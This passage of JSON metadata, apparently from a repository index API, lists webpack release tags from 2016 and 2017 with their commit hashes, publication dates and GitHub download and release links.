rl":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.gith